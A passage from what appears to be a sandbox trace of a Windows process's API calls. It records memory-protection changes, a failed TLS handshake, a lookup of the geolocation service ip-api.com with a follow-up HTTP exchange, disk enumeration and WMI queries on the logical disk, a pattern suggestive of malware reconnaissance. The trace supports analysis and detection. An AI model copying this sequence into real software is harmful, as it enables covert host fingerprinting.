OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.802] GetCurrentProcess () returned 0xffffffff [0117.802] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117c8, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.803] GetCurrentProcess () returned 0xffffffff [0117.803] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117c8, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.803] GetCurrentProcess () returned 0xffffffff [0117.803] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117d0, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.803] GetCurrentProcess () returned 0xffffffff [0117.803] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x777117d0, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.804] GetCurrentProcess () returned 0xffffffff [0117.804] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x7771180c, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.804] GetCurrentProcess () returned 0xffffffff [0117.804] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x7771180c, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.804] GetCurrentProcess () returned 0xffffffff [0117.804] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x7771182c, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.805] GetCurrentProcess () returned 0xffffffff [0117.805] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x7771182c, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.805] GetCurrentProcess () returned 0xffffffff [0117.805] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711860, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x4, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x20) returned 0x0 [0117.805] GetCurrentProcess () returned 0xffffffff [0117.805] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee2a4*=0x77711860, NumberOfBytesToProtect=0x6ee2a8, NewAccessProtection=0x20, OldAccessProtection=0x6ee2dc | out: BaseAddress=0x6ee2a4*=0x77711000, NumberOfBytesToProtect=0x6ee2a8, OldAccessProtection=0x6ee2dc*=0x4) returned 0x0 [0117.806] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0117.807] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0117.807] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0117.807] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0117.810] GetProcAddress (hModule=0x744a0000, lpProcName="DeleteSecurityContext") returned 0x757c0bb9 [0117.811] GetProcAddress (hModule=0x744a0000, lpProcName="InitializeSecurityContextW") returned 0x757c1557 [0117.811] InitializeSecurityContextW (in: phCredential=0x6ee5a4, phContext=0x0, pTargetName=0x3887c3c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x388a398, pOutput=0x388a330, pfContextAttr=0x3888c60, ptsExpiry=0x6ee59c | out: phNewContext=0x388a398, pOutput=0x388a330, pfContextAttr=0x3888c60, ptsExpiry=0x6ee59c) returned 0x90312 [0117.813] FreeContextBuffer (in: pvContextBuffer=0xbaa920 | out: pvContextBuffer=0xbaa920) returned 0x0 [0117.815] GetProcAddress (hModule=0x77230000, lpProcName="send") returned 0x77236f01 [0117.815] send (s=0x43c, buf=0x388a3ac*, len=159, flags=0) returned 159 [0117.818] GetProcAddress (hModule=0x77230000, lpProcName="recv") returned 0x77236b0e [0117.818] recv (in: s=0x43c, buf=0x388a3ac, len=5, flags=0 | out: buf=0x388a3ac*) returned 5 [0117.847] recv (in: s=0x43c, buf=0x388a3b1, len=2, flags=0 | out: buf=0x388a3b1*) returned 2 [0117.848] InitializeSecurityContextW (in: phCredential=0x6ee508, phContext=0x6ee594, pTargetName=0x3887c3c, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x388a60c, Reserved2=0x0, phNewContext=0x388a398, pOutput=0x388a620, pfContextAttr=0x3888c60, ptsExpiry=0x6ee500 | out: phNewContext=0x388a398, pOutput=0x388a620, pfContextAttr=0x3888c60, ptsExpiry=0x6ee500) returned 0x80090326 [0117.862] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x80090326, dwLanguageId=0x0, lpBuffer=0x6ee3dc, nSize=0x101, Arguments=0x0 | out: lpBuffer="The message received was unexpected or badly formatted.\r\n") returned 0x39 [0117.875] DeleteSecurityContext (phContext=0x388a398) returned 0x0 [0117.907] GetProcAddress (hModule=0x744a0000, lpProcName="QueryContextAttributesW") returned 0x757c0ee4 [0117.918] GetProcAddress (hModule=0x77230000, lpProcName="shutdown") returned 0x7723449d [0117.919] shutdown (s=0x43c, how=2) returned 0 [0117.919] setsockopt (s=0x43c, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0117.919] closesocket (s=0x43c) returned 0 [0117.952] QueryPerformanceCounter (in: lpPerformanceCount=0x6eea28 | out: lpPerformanceCount=0x6eea28*=23822867903) returned 1 [0117.952] SetEvent (hEvent=0x2e8) returned 1 [0117.954] SetEvent (hEvent=0x2e8) returned 1 [0117.955] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x43c [0117.955] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a4 [0117.955] GetAddrInfoW (in: pNodeName="ip-api.com", pServiceName=0x0, pHints=0x6ee770*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6ee718 | out: ppResult=0x6ee718*=0x59449b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x59449d8*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) returned 0 [0117.956] GetCurrentThreadId () returned 0xb0c [0117.956] ResetEvent (hEvent=0xb8) returned 1 [0117.956] GetCurrentThreadId () returned 0xb0c [0117.956] GetCurrentThreadId () returned 0xb0c [0117.956] GetCurrentThreadId () returned 0xb0c [0117.956] GetCurrentThreadId () returned 0xb0c [0117.956] ResetEvent (hEvent=0xb8) returned 1 [0117.956] GetCurrentThreadId () returned 0xb0c [0117.956] GetCurrentThreadId () returned 0xb0c [0117.957] SetEvent (hEvent=0xbc) returned 1 [0117.957] SetEvent (hEvent=0xb8) returned 1 [0117.957] CloseHandle (hObject=0x4a8) returned 1 [0117.958] GetCurrentThreadId () returned 0xb0c [0117.958] ResetEvent (hEvent=0xb8) returned 1 [0117.958] GetCurrentThreadId () returned 0xb0c [0117.958] GetCurrentThreadId () returned 0xb0c [0117.958] GetCurrentThreadId () returned 0xb0c [0117.958] GetCurrentThreadId () returned 0xb0c [0117.958] ResetEvent (hEvent=0xb8) returned 1 [0117.958] GetCurrentThreadId () returned 0xb0c [0117.958] GetCurrentThreadId () returned 0xb0c [0117.958] SetEvent (hEvent=0xbc) returned 1 [0117.958] SetEvent (hEvent=0xb8) returned 1 [0117.958] CloseHandle (hObject=0x45c) returned 1 [0117.976] FreeAddrInfoW (pAddrInfo=0x59449b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x59449d8*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) [0117.976] WSAConnect (in: s=0x43c, name=0x388f43c*(sa_family=2, sin_port=0x50, sin_addr="208.95.112.1"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0118.000] closesocket (s=0x4a4) returned 0 [0118.000] send (s=0x43c, buf=0x388894c*, len=85, flags=0) returned 85 [0118.001] GetProcAddress (hModule=0x77230000, lpProcName="setsockopt") returned 0x772341b6 [0118.002] setsockopt (s=0x43c, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0118.002] recv (in: s=0x43c, buf=0x3883b80, len=4096, flags=0 | out: buf=0x3883b80*) returned 191 [0118.033] setsockopt (s=0x43c, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0118.034] SetEvent (hEvent=0x2e8) returned 1 [0118.038] GetLogicalDrives () returned 0x4 [0118.038] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x6ee538, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0118.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea44) returned 1 [0118.038] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x6eeac0 | out: lpFileInformation=0x6eeac0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xfccb1620, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccb1620, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0118.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea40) returned 1 [0118.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eeaa8) returned 1 [0118.042] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceEx") returned 0x0 [0118.045] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExW") returned 0x76d5d50f [0118.045] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x6eead4, lpTotalNumberOfBytes=0x6eeacc, lpTotalNumberOfFreeBytes=0x6eeac4 | out: lpFreeBytesAvailableToCaller=0x6eead4, lpTotalNumberOfBytes=0x6eeacc, lpTotalNumberOfFreeBytes=0x6eeac4) returned 1 [0118.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeaa4) returned 1 [0118.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eeaa8) returned 1 [0118.045] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x6eead4, lpTotalNumberOfBytes=0x6eeacc, lpTotalNumberOfFreeBytes=0x6eeac4 | out: lpFreeBytesAvailableToCaller=0x6eead4, lpTotalNumberOfBytes=0x6eeacc, lpTotalNumberOfFreeBytes=0x6eeac4) returned 1 [0118.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeaa4) returned 1 [0118.047] CoTaskMemAlloc (cb=0x20c) returned 0xbc96b0 [0118.047] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbc96b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0118.047] CoTaskMemFree (pv=0xbc96b0) [0118.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6ee4b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0118.048] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eea00 | out: ppv=0x6eea00*=0xb51e34) returned 0x0 [0118.048] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6ee9f8 | out: pAptType=0x6ee9f8*=1) returned 0x0 [0118.048] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ee9fc | out: ppvObject=0x6ee9fc*=0x0) returned 0x80004002 [0118.048] IUnknown:Release (This=0xb51e34) returned 0x0 [0118.050] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee368 | out: ppv=0x6ee368*=0x6010a80) returned 0x0 [0118.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010a80, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee580 | out: ppvObject=0x6ee580*=0x0) returned 0x80004002 [0118.051] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6010a80, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee594 | out: ppvObject=0x6ee594*=0x6010910) returned 0x0 [0118.051] WbemDefPath:IUnknown:Release (This=0x6010a80) returned 0x0 [0118.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee1b4 | out: ppvObject=0x6ee1b4*=0x6010910) returned 0x0 [0118.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x0) returned 0x80004002 [0118.051] WbemDefPath:IUnknown:AddRef (This=0x6010910) returned 0x3 [0118.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edacc | out: ppvObject=0x6edacc*=0x0) returned 0x80004002 [0118.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda7c | out: ppvObject=0x6eda7c*=0x0) returned 0x80004002 [0118.051] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda88 | out: ppvObject=0x6eda88*=0xbb57e8) returned 0x0 [0118.051] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb57e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda90 | out: pCid=0x6eda90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0118.052] WbemDefPath:IUnknown:Release (This=0xbb57e8) returned 0x3 [0118.052] CoGetContextToken (in: pToken=0x6edae8 | out: pToken=0x6edae8) returned 0x0 [0118.052] CoGetContextToken (in: pToken=0x6edef0 | out: pToken=0x6edef0) returned 0x0 [0118.052] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf80 | out: ppvObject=0x6edf80*=0x0) returned 0x80004002 [0118.052] WbemDefPath:IUnknown:Release (This=0x6010910) returned 0x2 [0118.052] WbemDefPath:IUnknown:Release (This=0x6010910) returned 0x1 [0118.052] CoGetContextToken (in: pToken=0x6ee878 | out: pToken=0x6ee878) returned 0x0 [0118.052] CoGetContextToken (in: pToken=0x6ee7d8 | out: pToken=0x6ee7d8) returned 0x0 [0118.052] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010910, riid=0x6ee8a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee8a4 | out: ppvObject=0x6ee8a4*=0x6010910) returned 0x0 [0118.052] WbemDefPath:IUnknown:AddRef (This=0x6010910) returned 0x3 [0118.052] WbemDefPath:IUnknown:Release (This=0x6010910) returned 0x2 [0118.052] WbemDefPath:IWbemPath:SetText (This=0x6010910, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0118.052] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010910, puCount=0x6eea2c | out: puCount=0x6eea2c*=0x0) returned 0x0 [0118.052] WbemDefPath:IWbemPath:GetText (in: This=0x6010910, lFlags=2, puBuffLength=0x6eea28*=0x0, pszText=0x0 | out: puBuffLength=0x6eea28*=0x20, pszText=0x0) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetText (in: This=0x6010910, lFlags=2, puBuffLength=0x6eea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6eea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetInfo (in: This=0x6010910, uRequestedInfo=0x0, puResponse=0x6eea34 | out: puResponse=0x6eea34*=0xc19) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010910, puCount=0x6eea2c | out: puCount=0x6eea2c*=0x0) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetInfo (in: This=0x6010910, uRequestedInfo=0x0, puResponse=0x6eea34 | out: puResponse=0x6eea34*=0xc19) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetInfo (in: This=0x6010910, uRequestedInfo=0x0, puResponse=0x6eea34 | out: puResponse=0x6eea34*=0xc19) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010910, puCount=0x6ee9ac | out: puCount=0x6ee9ac*=0x0) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6ee998 | out: puCount=0x6ee998*=0x2) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6ee994*=0x0, pszText=0x0 | out: puBuffLength=0x6ee994*=0xf, pszText=0x0) returned 0x0 [0118.053] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6ee994*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ee994*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0118.053] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee948 | out: ppv=0x6ee948*=0xb51e34) returned 0x0 [0118.053] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6ee940 | out: pAptType=0x6ee940*=1) returned 0x0 [0118.053] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ee944 | out: ppvObject=0x6ee944*=0x0) returned 0x80004002 [0118.053] IUnknown:Release (This=0xb51e34) returned 0x0 [0118.054] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee2b0 | out: ppv=0x6ee2b0*=0x6010980) returned 0x0 [0118.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010980, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee4c8 | out: ppvObject=0x6ee4c8*=0x0) returned 0x80004002 [0118.054] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6010980, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee4dc | out: ppvObject=0x6ee4dc*=0x601cc08) returned 0x0 [0118.054] WbemDefPath:IUnknown:Release (This=0x6010980) returned 0x0 [0118.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee0fc | out: ppvObject=0x6ee0fc*=0x601cc08) returned 0x0 [0118.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee0b8 | out: ppvObject=0x6ee0b8*=0x0) returned 0x80004002 [0118.055] WbemDefPath:IUnknown:AddRef (This=0x601cc08) returned 0x3 [0118.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda14 | out: ppvObject=0x6eda14*=0x0) returned 0x80004002 [0118.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6ed9c4 | out: ppvObject=0x6ed9c4*=0x0) returned 0x80004002 [0118.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed9d0 | out: ppvObject=0x6ed9d0*=0xbb57d8) returned 0x0 [0118.055] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb57d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6ed9d8 | out: pCid=0x6ed9d8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0118.055] WbemDefPath:IUnknown:Release (This=0xbb57d8) returned 0x3 [0118.055] CoGetContextToken (in: pToken=0x6eda30 | out: pToken=0x6eda30) returned 0x0 [0118.055] CoGetContextToken (in: pToken=0x6ede38 | out: pToken=0x6ede38) returned 0x0 [0118.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edec8 | out: ppvObject=0x6edec8*=0x0) returned 0x80004002 [0118.055] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x2 [0118.055] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x1 [0118.055] CoGetContextToken (in: pToken=0x6ee7c0 | out: pToken=0x6ee7c0) returned 0x0 [0118.055] CoGetContextToken (in: pToken=0x6ee720 | out: pToken=0x6ee720) returned 0x0 [0118.055] WbemDefPath:IUnknown:QueryInterface (in: This=0x601cc08, riid=0x6ee7f0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee7ec | out: ppvObject=0x6ee7ec*=0x601cc08) returned 0x0 [0118.055] WbemDefPath:IUnknown:AddRef (This=0x601cc08) returned 0x3 [0118.056] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x2 [0118.056] WbemDefPath:IWbemPath:SetText (This=0x601cc08, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0118.056] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601cc08, puCount=0x6ee970 | out: puCount=0x6ee970*=0x2) returned 0x0 [0118.056] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=4, puBuffLength=0x6ee96c*=0x0, pszText=0x0 | out: puBuffLength=0x6ee96c*=0xf, pszText=0x0) returned 0x0 [0118.056] WbemDefPath:IWbemPath:GetText (in: This=0x601cc08, lFlags=4, 